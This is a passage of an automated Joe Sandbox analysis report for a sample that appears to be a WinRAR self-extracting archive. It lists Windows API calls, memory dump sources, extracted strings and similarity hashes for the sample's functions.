                    • GetModuleHandleW.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE162B
                    • GetProcAddress.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE1648
                    • GetProcAddress.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE1664
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                    • API String ID: 667068680-1718035505
                    • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                    • Instruction ID: e3b67ab74049ec37b2913a49a5c1d3b75b5b2198f26d218d97a66d898b230ad9
                    • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                    • Instruction Fuzzy Hash: 85113C20F09B0281FF59EB00A9423749395AF48796FCD853BC81D46358EEBCA594CA33
                    APIs
                      • Part of subcall function 00007FF7E1DC51A4: GetVersionExW.KERNEL32 ref: 00007FF7E1DC51D5
                    • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCED8C
                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCED98
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDA8
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDB6
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDC4
                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEE05
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion
                    • String ID:
                    • API String ID: 2092733347-0
                    • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                    • Instruction ID: cefe44aa1938e9313dfd923b645c46346187aac38f8270c79abb7a9ac5434d6f
                    • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                    • Instruction Fuzzy Hash: 3251BCB2B006518BEB04DFB8D4412ACB7B5F748B88BA0403ADE0D57B58DF78E552CB51
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion
                    • String ID:
                    • API String ID: 2092733347-0
                    • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                    • Instruction ID: 027bde150165d0a547212c85eb55af3c2f77087487a9e22845b33b53ccbae8e8
                    • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                    • Instruction Fuzzy Hash: 29316B66B00A518DFB00DFB5D8812EC7370FB08748B94503AEE0D93A58EF78D995C311
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: .rar$exe$rar$sfx
                    • API String ID: 3668304517-630704357
                    • Opcode ID: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
                    • Instruction ID: eb53b55f0e074bfc5f77de7fa3df6868a5086c31ea7f780718e59a7002732f44
                    • Opcode Fuzzy Hash: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
                    • Instruction Fuzzy Hash: 1AA1C322A14A0640EB04EB25D8463BDA361BF44BA8F845637DE1D076D9DFBCE591C3A2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: abort$CallEncodePointerTranslator
                    • String ID: MOC$RCC
                    • API String ID: 2889003569-2084237596
                    • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                    • Instruction ID: 6ed1e91ef9d2aa3b9a51b6705739f77dcb03c3bb37bf1b9460528b1077ade697
                    • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                    • Instruction Fuzzy Hash: 9E91DFB7E08B858AE714EB64E4813ADBBA0F704789F50813AEE4D87B55DF78D091CB01
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                    • String ID: csm$f
                    • API String ID: 2395640692-629598281
                    • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                    • Instruction ID: 7e58b30fd186df0347e1598f5f27a7cdeb64f32688f42f3c99eda770cad47172
                    • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                    • Instruction Fuzzy Hash: C2511476E0960286EB18EF11E441B28B795FB40BC9F90C132EA1F87748DFB8E941C751
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                    • API String ID: 2102711378-639343689
                    • Opcode ID: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
                    • Instruction ID: 1668c8b9e98d3bbdd1ce7808b20e085a9707c610e1662256e81b81d6f5be6c0d
                    • Opcode Fuzzy Hash: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
                    • Instruction Fuzzy Hash: 54511562F08A5255FB00FB60D8537BDA361AF847E8F840132ED5E53696DFBCE485C222
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Window$Show$Rect
                    • String ID: RarHtmlClassName
                    • API String ID: 2396740005-1658105358
                    • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                    • Instruction ID: 2e62870e65fb757fbd1bda321de6b9aa9b13a3bf78289bb6f69361299b9226dd
                    • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                    • Instruction Fuzzy Hash: 8C51B832B087418AEB24EB25E45637AE360FF84B95F844576EE8E43B54DFBCE0458711
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                    • String ID: sfxcmd$sfxpar
                    • API String ID: 3540648995-3493335439
                    • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                    • Instruction ID: df48cc396159174bacbef44a2b046e1b122c38519f27a29b3391f3841e80f16d
                    • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                    • Instruction Fuzzy Hash: 4D31B632E14A0584EF04EB69D8862AC7371FB48B9CF940632DE5D17798DF78D192C355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID: RENAMEDLG$REPLACEFILEDLG
                    • API String ID: 0-56093855
                    • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                    • Instruction ID: 85a40b56fa9696c7fc49f7a23bccf63d3df32a94d8178bac27f7e44259b23305
                    • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                    • Instruction Fuzzy Hash: A5211226A08B4780FB10EB15F8463B5E360AB4AB89FD50177E58D47364CEBCE1998362
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                    • Instruction ID: a55f9bd5a4a79f8fe802cbe9fc2530b63fd41b345ad3cc3ad727db3e500e1959
                    • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                    • Instruction Fuzzy Hash: 08F04421B19A4281EF48EB11E446379A760AF8C794FC45037E94F46668DE7CE5E4C712
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                    • Instruction ID: 60aeb4988299d0665791c49312ba3e2956a44120c7f0dad3aaa063fe87155721
                    • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                    • Instruction Fuzzy Hash: 46811622F1865285FB21FB2588427BCA7A0BB49B54FC44137DD0E53799CFBCA661C322
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 2398171386-0
                    • Opcode ID: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
                    • Instruction ID: 61bc5517dbf522947cdceb7a794326577c71d0b986cac0e56231e97ba2db3426
                    • Opcode Fuzzy Hash: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
                    • Instruction Fuzzy Hash: 23512432F04B0269FB10EBB5E4423BCA371EB487A8F804A36DE1D467D8DE789155C352
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                    • String ID:
                    • API String ID: 3659116390-0
                    • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                    • Instruction ID: 51e681f7ef8905c382aa0965d5f893bfcf99fb853839cd23eee616f32f1837aa
                    • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                    • Instruction Fuzzy Hash: 7E512432B14A5189E721DF25D4413ACBBB0FB48798F448236DE4E47B98CF78D2A5C321
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocString
                    • String ID:
                    • API String ID: 262959230-0
                    • Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                    • Instruction ID: c1d40dde3edc4098f411bbd20d3411d329706bd0278b55c5dafcc857a985040e
                    • Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                    • Instruction Fuzzy Hash: FC41F832F0864685EB18EF219442378A290FF08BA5F948636EA6DC77D5DFBCD1518363
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID:
                    • API String ID: 190572456-0
                    • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                    • Instruction ID: 2e50ba05b0bb382185740808d65f20a19fa8386f393f9b1fde8b80d2f23a8a16
                    • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                    • Instruction Fuzzy Hash: A741F921F19A4281FB19EF12A8157B5A395BF14BD1F898537DD1D8B744EEBCE4408322
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID:
                    • API String ID: 1156100317-0
                    • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                    • Instruction ID: 153e2ef5d80bc453189b17167fb39914e5edf52445b1d55b81b932bcf84b5435
                    • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                    • Instruction Fuzzy Hash: D911B2F6E5CA0781FB54B124E54737985417F4D3A0EC88232EA7E065DECEFCA6608227
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
